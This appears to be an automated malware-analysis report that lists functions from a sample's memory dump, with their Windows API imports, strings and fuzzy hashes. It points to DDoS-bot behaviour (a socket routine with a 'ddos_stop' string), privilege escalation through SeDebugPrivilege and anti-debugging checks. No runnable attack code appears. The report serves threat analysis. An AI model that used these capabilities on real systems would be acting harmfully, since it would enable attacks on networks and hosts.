Uniqueness Score: -1.00%

Function 004107B6, Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000002,00000002), ref: 004107D9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: f12ed0640048525d821b22233eadc94aaa0895087cee4c8538a79ba317e0a674
Instruction ID: e110cca691539e17059a820ccb334c71c76e8421bb90a4e7a02472f114fcb635
Opcode Fuzzy Hash: f12ed0640048525d821b22233eadc94aaa0895087cee4c8538a79ba317e0a674
Instruction Fuzzy Hash: 02D02B309252144FC710E6385C06575739EE707331F200335DC76C11C0F90858114AC5

Uniqueness

Uniqueness Score: -1.00%

Function 0068A19C, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

__onexit.LIBCMT ref: 0068A1A2

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit
String ID:
API String ID: 1448380652-0
Opcode ID: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
Instruction ID: ae06a61387d797c22e828c1b7c25c3e299913563c78fa6e94896c5c9041a8ba6
Opcode Fuzzy Hash: d78d9142898b9c98952a14e3dedbcd9244443e9bdde8ff525791cf48f29bf47b
Instruction Fuzzy Hash: 71B0123119810E2A7E0479F5EC0A8357B4DD611660B400727FD0DC51E1DD12A4500285

Uniqueness

Uniqueness Score: -1.00%

Function 00413FBC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00413FC6

Part of subcall function 00583288: __Thrd_current.LIBCPMT ref: 0058329A
Part of subcall function 00583288: __Mtx_unlock.LIBCPMT ref: 005832E6
Part of subcall function 00583288: __Cnd_broadcast.LIBCPMT ref: 005832F1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Cnd_broadcastCnd_do_broadcast_at_thread_exitMtx_unlockThrd_current
String ID:
API String ID: 3770271663-0
Opcode ID: 3f8eb422f8433fb0099226f869301b37e91ae3a0cf73d807ab6ed0381c822d4a
Instruction ID: ff022d793bb8bf46b6e52066ac2f291b08853f54aaa20664c344421b08025672
Opcode Fuzzy Hash: 3f8eb422f8433fb0099226f869301b37e91ae3a0cf73d807ab6ed0381c822d4a
Instruction Fuzzy Hash: 2EC092352142089F8340FBB8D44A81A7BE8AF95B107504079BD068BA21DE31BE14CA96

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004FA652, Relevance: 141.7, APIs: 3, Strings: 74, Instructions: 6908libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000065,00000074,00000073,00000075,00000072,00000054,?,?,?,?,0000006E,00000065,00000070,0000006F), ref: 004FFAEB
GetProcAddress.KERNEL32(00000000), ref: 004FFAF8
GetProcAddress.KERNEL32(00429D28), ref: 004FFBDA

Strings

&, xrefs: 004FB422
!, xrefs: 004FBAA4
0, xrefs: 004FAF87
,, xrefs: 004FBB65
%, xrefs: 004FB191
g, xrefs: 004FB778
E, xrefs: 004FBBD0
m, xrefs: 004FE068
t, xrefs: 004FB605
_, xrefs: 004FF9B0
Y, xrefs: 004FCAB9
9, xrefs: 004FAE2D
Y, xrefs: 004FBEFD
<, xrefs: 004FAE08
I, xrefs: 004FBA8E
f, xrefs: 004FAE22
C, xrefs: 004FE1AC
c, xrefs: 004FBCCA
m, xrefs: 004FAADD
., xrefs: 004FB4C5
R, xrefs: 004FE1E4
K, xrefs: 004FB9BD
], xrefs: 004FAA5F
|, xrefs: 004FA702
W, xrefs: 004FBD68
", xrefs: 004FAC42
X, xrefs: 004FB953
P, xrefs: 004FB524
F, xrefs: 004FC725
}, xrefs: 004FAF28
x, xrefs: 004FBB70
@, xrefs: 004FC5C8
y, xrefs: 004FDE50
6, xrefs: 004FC71A
MoveWindow, xrefs: 004FD5B9
%, xrefs: 004FE1A4
p, xrefs: 004FA68C
+, xrefs: 004FAD9B
C, xrefs: 004FBF08
U, xrefs: 004FAD2E
B, xrefs: 004FBCBF
6, xrefs: 004FBA99
l, xrefs: 004FBDDE
2, xrefs: 004FB4BA
f, xrefs: 004FC903
h, xrefs: 004FBFB4
a, xrefs: 004FC636
H, xrefs: 004FBC46
O, xrefs: 004FC8F8
B, xrefs: 004FE1DC
h, xrefs: 004FB22B
, xrefs: 004FB106
L, xrefs: 004FF9B8
n, xrefs: 004FBDD3
*, xrefs: 004FC69D
+, xrefs: 004FC7DE
#, xrefs: 004FDB73
], xrefs: 004FCC53
<, xrefs: 004FBFA9
, xrefs: 004FB177
/, xrefs: 004FBC60
2, xrefs: 004FC8ED
k, xrefs: 004FC70F
L, xrefs: 004FCAAE
C, xrefs: 004FB211
Y, xrefs: 004FD11D
h, xrefs: 004FDE8E
2, xrefs: 004FAF0E
D, xrefs: 004FBBE6
t, xrefs: 004FC6A8
], xrefs: 004FC0DE
b, xrefs: 004FE070
[, xrefs: 004FB042
c, xrefs: 004FA9E1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID: $ $!$"$#$%$%$&$*$+$+$,$.$/$0$2$2$2$6$6$9$<$<$@$B$B$C$C$C$D$E$F$H$I$K$L$L$MoveWindow$O$P$R$U$W$X$Y$Y$Y$[$]$]$]$_$a$b$c$c$f$f$g$h$h$h$k$l$m$m$n$p$t$t$x$y$|$}
API String ID: 2238633743-1260566538
Opcode ID: 3b7b499daea1e5d9d27a2c2e590006adef64a6ed33a98e9c06e73abca07c894c
Instruction ID: 2a3eabaf19090a8cecd7460fd869387c1abbcb92e7859b9d7163c16bccd54f22
Opcode Fuzzy Hash: 3b7b499daea1e5d9d27a2c2e590006adef64a6ed33a98e9c06e73abca07c894c
Instruction Fuzzy Hash: EDD35E315087819FD729DF38D9846EABFE1FFCA300F04492ED5898B162DB34A549CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422D5E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00422D70

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

GetLastError.KERNEL32(?,0078835C,?,004AB6F7,80004005,007A29C4,?,004F4CC6,00000000,?,4s,?,?,004F508D), ref: 00422D76

Part of subcall function 00422D5E: LoadResource.KERNEL32(?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6,00000000), ref: 00422DD7
Part of subcall function 00422D5E: LockResource.KERNEL32(00000000,007A29C4,?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6), ref: 00422DE3
Part of subcall function 00422D5E: SizeofResource.KERNEL32(?,?,?,?,4s,?,?,8007000E,?,?,?,004AB6F7,80004005,007A29C4,?,004F4CC6), ref: 00422DF1

Strings

4s, xrefs: 00422DD0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Resource$ErrorExceptionException@8LastLoadLockRaiseSizeofThrow
String ID: 4s
API String ID: 294969344-1257959787
Opcode ID: 14b93b8610f04b95de01a3b08f1d8995d8b73e4958a1c2cc6fbb48db3d2eb4bc
Instruction ID: e2ff399347e63724e1a48493567a94bfb53cd13b7b159f511e72fd9b16053eda
Opcode Fuzzy Hash: 14b93b8610f04b95de01a3b08f1d8995d8b73e4958a1c2cc6fbb48db3d2eb4bc
Instruction Fuzzy Hash: 3E218731300334BB9B346A69BE88ABB779CDE40340790492BFD06E7210D9F8DC8091E9

Uniqueness

Uniqueness Score: -1.00%

Function 0047E75C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E77A
OpenProcessToken.ADVAPI32(00000000,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E781
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,0047E90F), ref: 0047E795
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,0000007F), ref: 0047E7C5
CloseHandle.KERNEL32(?,?,?,0000007F,?,?,?,?,0047E90F), ref: 0047E7D0

Strings

SeDebugPrivilege, xrefs: 0047E78F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3038321057-2896544425
Opcode ID: 0c29f445ca04c2798a4101f98d1b68dfa0cfbf5040bcb354011ccd277078b067
Instruction ID: aace4f5f6edd183b133fdf4e4701db54a5bb30bb7a59a62e2ce5c2b82c276aab
Opcode Fuzzy Hash: 0c29f445ca04c2798a4101f98d1b68dfa0cfbf5040bcb354011ccd277078b067
Instruction Fuzzy Hash: AA01E975D01219AFEB109BE59C49EEFBBBCEF09750F004556B904E6290DBB49A05CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0042711E, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 358COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00427259
__aulldvrm.LIBCMT ref: 004273FA
__aulldvrm.LIBCMT ref: 0042748D

Strings

d, xrefs: 00427195

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __aulldvrm
String ID: d
API String ID: 1302938615-2564639436
Opcode ID: 92f3a314f94aee7bf3664951fd0aa7892cd7bea82081848237beda51ead6e1f3
Instruction ID: 2a29e47dfeb645cbba4989c50d10ac3a17c78e97e4c22e969295b565acbb20f5
Opcode Fuzzy Hash: 92f3a314f94aee7bf3664951fd0aa7892cd7bea82081848237beda51ead6e1f3
Instruction Fuzzy Hash: 91E1B7A9A0D2D09EDF06DF6DB4A11ADBF739B5A201708C0DAC9D54B323C5384D11D77A

Uniqueness

Uniqueness Score: -1.00%

Function 005CF200, Relevance: 6.1, APIs: 4, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(005D004B,00000000,00000007,00000000,00000003,02200000,00000000,CAAA386B,?,00000000,?,005D004B,?), ref: 005CF243
new.LIBCMT ref: 005CF263
DeviceIoControl.KERNEL32 ref: 005CF291
CloseHandle.KERNEL32(00000000), ref: 005CF2D0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 0b54ab45198747c1bd594de1eae66aeb640065ccfb0b1a0b290d69b5a6369305
Instruction ID: 364d7e8f96c196a85623c56f144f71f59c499aa789fc39dfd9d813af084301b4
Opcode Fuzzy Hash: 0b54ab45198747c1bd594de1eae66aeb640065ccfb0b1a0b290d69b5a6369305
Instruction Fuzzy Hash: EB210D79A84304BFE7608F94DC4AF997FA9FB05724F200229F915AB2C0D7B45A04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004BAF5C, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004BAF61
___from_strstr_to_strchr.LIBCMT ref: 004BB048

Part of subcall function 004BC47A: __EH_prolog.LIBCMT ref: 004BC47F

Part of subcall function 004BD4BA: __EH_prolog.LIBCMT ref: 004BD4BF

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 004BB043

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$___from_strstr_to_strchr
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
API String ID: 423314503-3812731148
Opcode ID: f7944ef7c53056260a9f4d1e851776a17f0ce83f9c86b73060d9863230577118
Instruction ID: 20005f4af06ca05258a67fcc0cc7a6772db13b2771217b54e43b06ac8c3df241
Opcode Fuzzy Hash: f7944ef7c53056260a9f4d1e851776a17f0ce83f9c86b73060d9863230577118
Instruction Fuzzy Hash: 3DD1B07060060AAFDB19DF28C495BFABBE1FF44304F14419AE8558B351C7B8E862DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00694A7C, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00694B74
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00694B7E
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00694B8B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 213618320b1f1cd4da55a2db008bc165d022cf1319aebd18e305d45585413880
Instruction ID: 85daea7fac1579cadb72c8b2f5492f4f6451548d63094e1c215be46a994d0ca6
Opcode Fuzzy Hash: 213618320b1f1cd4da55a2db008bc165d022cf1319aebd18e305d45585413880
Instruction Fuzzy Hash: 1831C27490131D9BCB61DF64D888BDCBBB9BF08310F5042EAE40CA6260EB749F818F44

Uniqueness

Uniqueness Score: -1.00%

Function 004B8B6B, Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B8B70
GetProcessHeap.KERNEL32(00000000,00000060,?,?,00000000), ref: 004B8B84
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004B8B8B

Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D

Part of subcall function 004B0DE2: __CxxThrowException@8.LIBVCRUNTIME ref: 004B0DFC
Part of subcall function 004B0DE2: __EH_prolog.LIBCMT ref: 004B0E07
Part of subcall function 004B0DE2: GetProcessHeap.KERNEL32(00000000,00000040), ref: 004B0E1B
Part of subcall function 004B0DE2: HeapAlloc.KERNEL32(00000000), ref: 004B0E22

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$H_prolog$AllocProcess$Exception@8Throw
String ID:
API String ID: 366758686-0
Opcode ID: 1f2dc041dcf747c3e80210d5c6422096e2b3a00b93f2d3bf26ed929f5451a444
Instruction ID: 6a4b64ab387b7b43378e0e3dd9749b4186d1dcc24dccc6994ed67e7ae1b888d3
Opcode Fuzzy Hash: 1f2dc041dcf747c3e80210d5c6422096e2b3a00b93f2d3bf26ed929f5451a444
Instruction Fuzzy Hash: 07118FB1D05248EADB01DBA9C949BDEFFF8EF54304F10409EE504AB242D7B95B04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 006A482C, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002,00000000,?,006A079B,00000003), ref: 006A484D
TerminateProcess.KERNEL32(00000000,?,006A4802,00000003,00787658,0000000C,006A4915,00000003,00000002,00000000,?,006A079B,00000003), ref: 006A4854
ExitProcess.KERNEL32 ref: 006A4866

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3fc61e91a752e9279f1770505552df39a409bf8df217255db5645af78741ceb5
Instruction ID: b631c7924654aac4327bdde4169b348a290752bfb8016a36d2ac4d5f84b382a9
Opcode Fuzzy Hash: 3fc61e91a752e9279f1770505552df39a409bf8df217255db5645af78741ceb5
Instruction Fuzzy Hash: 43E0BF31000284AFDF517F54DD89E883B6BEB91751B005028F9164E122CFB9DD92CE50

Uniqueness

Uniqueness Score: -1.00%

Function 004269D4, Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,00000220,00000000,00000000,00000000,?,00000000,74B5FA50,00426975,?,?,00000000,00000000,?,00000000), ref: 004269EC
GetLastError.KERNEL32(?,00000000,74B5FA50,00426975,?,?,00000000,00000000,?,00000000,00000000,00000000), ref: 00426A11

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 3f47211a3d1292322d94dd9ffac7f2ed8caf95052f2821213890d616a833dccf
Instruction ID: 7476eb702744dd527e45b7fff867582633ed137c3c2e3e9643eb08402786ddb1
Opcode Fuzzy Hash: 3f47211a3d1292322d94dd9ffac7f2ed8caf95052f2821213890d616a833dccf
Instruction Fuzzy Hash: 91F0BBF13443109BE3305A79ACC8FA37959E785328F91491FF25AA61D0CBB49C464674

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA72, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c3f7e1f18e3c7d79d3b64c130862757a094c5a6eed26b047f490793c0227657
Instruction ID: a81d5ed95a12d33e288bf159931503bdfebec61ba3c2220e1b971e36f664e6c7
Opcode Fuzzy Hash: 8c3f7e1f18e3c7d79d3b64c130862757a094c5a6eed26b047f490793c0227657
Instruction Fuzzy Hash: 42312477A14285CFC308CF6D5C823A9BF60FBE2200B04866AE845E72C2D2755515C75C

Uniqueness

Uniqueness Score: -1.00%

Function 00526AF6, Relevance: 63.1, APIs: 1, Strings: 35, Instructions: 111COMMON

Download Yara Rule

APIs

__swprintf.LEGACY_STDIO_DEFINITIONS ref: 00526C17

Strings

Parsing error, xrefs: 00526B5D
Assertion failed, xrefs: 00526B6F
Requested object was not found, xrefs: 00526B2D
Input image depth is not supported by function, xrefs: 00526BD0
Gpu API call, xrefs: 00526B7B
Unspecified error, xrefs: 00526C2F
Insufficient memory, xrefs: 00526C3B
Null pointer, xrefs: 00526B8D
Bad argument, xrefs: 00526BDC
Bad type of mask argument, xrefs: 00526B57
Incorrect size of input array, xrefs: 00526B1B
Formats of input arguments do not match, xrefs: 00526B33
status, xrefs: 00526C03, 00526C10
Unsupported format or combination of formats, xrefs: 00526B45
Iterations do not converge, xrefs: 00526BB8
Autotrace call, xrefs: 00526BBE
Bad flag (parameter or structure field), xrefs: 00526B4B
Image step is wrong, xrefs: 00526BC4
No Error, xrefs: 00526C23
Input COI is not supported, xrefs: 00526BD6
error, xrefs: 00526BFD
Inplace operation is not supported, xrefs: 00526B27
OpenGL API call, xrefs: 00526B87
Bad number of channels, xrefs: 00526BCA
The function/feature is not implemented, xrefs: 00526B63
No GPU support, xrefs: 00526B75
Internal error, xrefs: 00526C35
No OpenGL support, xrefs: 00526B81
Division by zero occured, xrefs: 00526B21
Sizes of input arguments do not match, xrefs: 00526B39
Backtrace, xrefs: 00526C29
Bad parameter of type CvPoint, xrefs: 00526B51
Memory block has been corrupted, xrefs: 00526B69
Unknown %s code %d, xrefs: 00526C11
One of arguments' values is out of range, xrefs: 00526B3F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __swprintf
String ID: Assertion failed$Autotrace call$Backtrace$Bad argument$Bad flag (parameter or structure field)$Bad number of channels$Bad parameter of type CvPoint$Bad type of mask argument$Division by zero occured$Formats of input arguments do not match$Gpu API call$Image step is wrong$Incorrect size of input array$Inplace operation is not supported$Input COI is not supported$Input image depth is not supported by function$Insufficient memory$Internal error$Iterations do not converge$Memory block has been corrupted$No Error$No GPU support$No OpenGL support$Null pointer$One of arguments' values is out of range$OpenGL API call$Parsing error$Requested object was not found$Sizes of input arguments do not match$The function/feature is not implemented$Unknown %s code %d$Unspecified error$Unsupported format or combination of formats$error$status
API String ID: 1857805200-1549692122
Opcode ID: f3631eacad4194858451593ae7bd8c722872eccafc81514b0dc3c4b03d3a3f41
Instruction ID: 53b4af2ab741bcb213036afcfe5f3fbf30b126f3875418c0a415ac75eb0e4bf0
Opcode Fuzzy Hash: f3631eacad4194858451593ae7bd8c722872eccafc81514b0dc3c4b03d3a3f41
Instruction Fuzzy Hash: DC21C62DA0086587BF2CD23C696453D2480FED63A4FEC47B6F569D3EE3C25D8D412146

Uniqueness

Uniqueness Score: -1.00%

Function 004188AB, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 289networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004188AF

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004188BA
gethostbyname.WS2_32(?), ref: 004188EE
_strlen.LIBCMT ref: 004189A8
htons.WS2_32(00000000), ref: 004189DE
socket.WS2_32(00000002,00000001,00000006), ref: 004189FB
setsockopt.WS2_32(00000000,0000FFFF,00001006,000003E8,00000004), ref: 00418A1B
connect.WS2_32(00000000,?,00000010), ref: 00418AC1

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

(, xrefs: 00418BD8
-, xrefs: 00418A58
b, xrefs: 00418BDF
ddos_stop, xrefs: 00418914

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateExceptionException@8H_prologRaiseThrow_strlenconnectgethostbynamehtonssetsockoptsocketstd::_
String ID: ($-$b$ddos_stop
API String ID: 1589026174-1644948824
Opcode ID: aaeb176c12de37d60f5f3604a19b1f3e0bdd312ed1823fd8247742c14e5e0221
Instruction ID: 212e067d65c976a6134065eda8ad71f5aa434052f10650b04c9e458efc0c0cbd
Opcode Fuzzy Hash: aaeb176c12de37d60f5f3604a19b1f3e0bdd312ed1823fd8247742c14e5e0221
Instruction Fuzzy Hash: FEB12271900248AEEB10DFA8DC85BEDBBB8BF19304F10416FF505A71A1EB786E84CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00408186, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040818B
_strlen.LIBCMT ref: 004081B3

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 004081FD
_strlen.LIBCMT ref: 00408244
_strlen.LIBCMT ref: 0040828B
_strlen.LIBCMT ref: 004082D5
_strlen.LIBCMT ref: 00408334

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040822F, 0040823A, 0040824B
54FF53A5F1D36F1C, xrefs: 00408276, 00408281, 00408292
10E527FADE682D1D, xrefs: 004082BD, 004082C8, 004082DC
A09E667F3BCC908B, xrefs: 0040819B, 004081A9, 004081BA
B05688C2B3E6C1FD, xrefs: 00408310, 00408321, 0040833B
B67AE8584CAA73B2, xrefs: 004081E8, 004081F3, 00408204

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 57732211ff139cb00e1bb69c9c6a8ab235017c89e8967faea0324362c7be009f
Instruction ID: 15fbb3c951a0cf78df6a900232873ff12f33c2b58c4e3dc235cfb68bbab15b2e
Opcode Fuzzy Hash: 57732211ff139cb00e1bb69c9c6a8ab235017c89e8967faea0324362c7be009f
Instruction Fuzzy Hash: 56518371C05298EEEB50EBA9D841BEDBBF4AF55300F2041AEE518F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004043CE, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004043D3
_strlen.LIBCMT ref: 004043FB

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 00404445
_strlen.LIBCMT ref: 0040448C
_strlen.LIBCMT ref: 004044D3
_strlen.LIBCMT ref: 0040451D
_strlen.LIBCMT ref: 0040457C

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00404477, 00404482, 00404493
54FF53A5F1D36F1C, xrefs: 004044BE, 004044C9, 004044DA
10E527FADE682D1D, xrefs: 00404505, 00404510, 00404524
A09E667F3BCC908B, xrefs: 004043E3, 004043F1, 00404402
B05688C2B3E6C1FD, xrefs: 00404558, 00404569, 00404583
B67AE8584CAA73B2, xrefs: 00404430, 0040443B, 0040444C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: a05964c4240bb29b84bc47a30544d52aa460b11c277d4453b8abda04bce375ef
Instruction ID: 4e1a102844bff2765a4901dda53e7d72d31fbbcdeb7d9b590e8ec79db0352fad
Opcode Fuzzy Hash: a05964c4240bb29b84bc47a30544d52aa460b11c277d4453b8abda04bce375ef
Instruction Fuzzy Hash: 2C517571C05298AEEF50EBA9D841BEDBBF4AF55300F2040AEE518F7282DA741E44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C56F, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C574
_strlen.LIBCMT ref: 0040C59C

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 0040C5E6
_strlen.LIBCMT ref: 0040C62D
_strlen.LIBCMT ref: 0040C674
_strlen.LIBCMT ref: 0040C6BE
_strlen.LIBCMT ref: 0040C71D

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 0040C618, 0040C623, 0040C634
54FF53A5F1D36F1C, xrefs: 0040C65F, 0040C66A, 0040C67B
10E527FADE682D1D, xrefs: 0040C6A6, 0040C6B1, 0040C6C5
A09E667F3BCC908B, xrefs: 0040C584, 0040C592, 0040C5A3
B05688C2B3E6C1FD, xrefs: 0040C6F9, 0040C70A, 0040C724
B67AE8584CAA73B2, xrefs: 0040C5D1, 0040C5DC, 0040C5ED

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 5bcb80a94d81732a43f76d10be2838a5a8e08df01339c7ecbfeca557b1d16c31
Instruction ID: 820a24787a4c911dc0989f6c5ac4e6f79867204f4eee875757e2da9dc1641ecf
Opcode Fuzzy Hash: 5bcb80a94d81732a43f76d10be2838a5a8e08df01339c7ecbfeca557b1d16c31
Instruction Fuzzy Hash: A0517371C05298AEEB50EBA9D841BEDBBF4AF55300F1040AEE519F7282DA741F44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004025C9, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004025CE
_strlen.LIBCMT ref: 004025F6

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

_strlen.LIBCMT ref: 00402640
_strlen.LIBCMT ref: 00402687
_strlen.LIBCMT ref: 004026CE
_strlen.LIBCMT ref: 00402718
_strlen.LIBCMT ref: 00402777

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

C6EF372FE94F82BE, xrefs: 00402672, 0040267D, 0040268E
54FF53A5F1D36F1C, xrefs: 004026B9, 004026C4, 004026D5
10E527FADE682D1D, xrefs: 00402700, 0040270B, 0040271F
A09E667F3BCC908B, xrefs: 004025DE, 004025EC, 004025FD
B05688C2B3E6C1FD, xrefs: 00402753, 00402764, 0040277E
B67AE8584CAA73B2, xrefs: 0040262B, 00402636, 00402647

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
